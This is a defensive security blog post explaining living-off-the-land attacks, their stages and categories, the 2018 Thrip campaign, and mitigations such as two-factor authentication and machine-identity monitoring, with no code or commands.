Every company’s security provisions and network structures are multi-layered. A hacker gaining unauthorized access to one area of the network doesn’t necessarily mean they can steal data or affect operations in another.
However, in some situations an attacker is able to take the resources that they initially gain access to, primarily operating system features or network administrator tools, and use them to extend their infiltration. More and more, attackers are leveraging machine identities to hijack machine-to-machine connections and communications to move laterally through a network.
This is known as living off the land (LotL) and it is a growing problem for cybersecurity experts. In this post we explain how LotL attacks are carried out, how they can be identified and what you can do to mitigate the problem.
SSL/TLS Certificates and Their Prevalence on the Dark Web
What are living off the land attacks?
Any intrusion that involves a malicious attacker deploying a network’s own tools against it to extend the attack has elements of a LotL approach.
Such attacks are sometimes described as fileless or zero-footprint attacks as they don't require the installation of malware from an external source. This makes them very difficult for antivirus tools to detect accurately as there are no indicators of outside connections, data exchange or interference.
LotL attacks can also be highly effective. The Ponemon Institute's State of Endpoint Security Risk Report found that fileless attacks are about ten times more likely to succeed than file-based attacks.
How LotL attacks take place
A living off the land attack usually follows three stages:
Gaining entry – while companies increasingly optimize security to guard against malware, less attention is sometimes paid to securing remote access systems. A company’s Virtual Private Network (VPN) or other remote access solution can be used by a wide range of internal and external stakeholders, including third-party contractors, and be a critical vulnerability when not properly secured.
Moving laterally – once inside a network an attacker living off the land will then use credentials, systems, and tools they have identified and accessed within it to move to other areas. This may be done by simply accessing new directories and data, or by setting up fake administrator accounts in order to change network settings.
Data theft and network damage – once they have access to the tools, permissions and directories needed the attacker can then carry out their malicious purpose. This will often be some form of personal data theft or operational disruption.
The four main categories of attack
Symantec states that attackers who are living off the land will usually use one of four approaches:
Dual-use tools – This involves the commandeering of legitimate network and system management tools to navigate through networks, execute commands, exfiltrate data, and potentially download additional malicious software. Common tools exploited include FTP clients and system utilities like PsExec, a Microsoft Sysinternals tool designed for process execution on remote systems.
Fileless persistence – This attack type enables a malicious agent to persist on a system even after a reboot without having to write to the hard disk. This is often achieved by embedding malicious scripts in the Windows Registry, such as those involving Visual Basic Scripting (VBS).
Memory-only threats – These attacks execute the malicious payload directly within the system's memory, bypassing traditional disk-based storage. An example is the Code-Red worm of 2001, which exploited a vulnerability in Microsoft's IIS web server and spread widely without ever writing to the hard drive.
Non-Portable Executable (PE) file attacks – These attacks exploit scripts such as JavaScript or PowerShell, bypassing the need for binary executable (EXE) or dynamic-link library (DLL) files, to inflict harm.
Attacks may involve activities in one or more of these categories and there have been a number of combined threats identified over the years.
The Thrip attack
One of the major living off the land attacks occurred in January 2018. It was found that a large telecommunications operator in Southeast Asia had been infiltrated by attackers who were using internal tools and systems to avoid detection.
Once the system vulnerability and attackers’ behavior pattern had been noticed it was then identified at several other companies in the region, including businesses in the communication, defense and even satellite operations sectors.
The hackers, who became known as Thrip, were attempting to remotely install the malware Infostealer.Catchamas without tipping off system security personnel about their presence and activity.
Such behavior is another hallmark of an LotL attack. While moving and navigating within the network, using its own tools and functions, attackers will try to carry out “normal” activities in order to remain undetected for as long as possible. This can often mean that attacks aren’t spotted for weeks or even months.
How to protect against living off the land attacks
The initial strategy in defending against unauthorized access involves implementing robust security measures such as two-factor authentication and effective credential management across all VPNs and remote access systems.
Adopting a comprehensive approach to managing user and machine identities reduces the opportunities for malicious actors to penetrate and navigate through the network. Companies are especially vulnerable when keys and certificates are lost or compromised; such breaches provide attackers with the means to access secure, encrypted areas.
Attackers have manipulated system functionalities that handle certificate management. For example, CertUtil, a Windows utility for managing certificates, has been misused by attackers to download malicious payloads after tricking users into opening compromised files.
Enhancing the capacity to track and scrutinize identity creation and usage is important, as it increases the likelihood of detecting unusual activities typical of infiltrators early on—especially since those utilizing "living off the land" tactics often mimic legitimate behaviors to evade detection.
Ensuring that data transfers within the network between tools and system processes are securely encrypted will mitigate the extent of damage an attacker can inflict if they manage to breach the network undetected.
Ultimately, an attacker relying on "living off the land" methods is limited to the tools and systems accessible within the compromised network. By restricting access to potentially harmful features and controlling what they can do with them, it's more feasible to identify and halt a LotL attack more swiftly.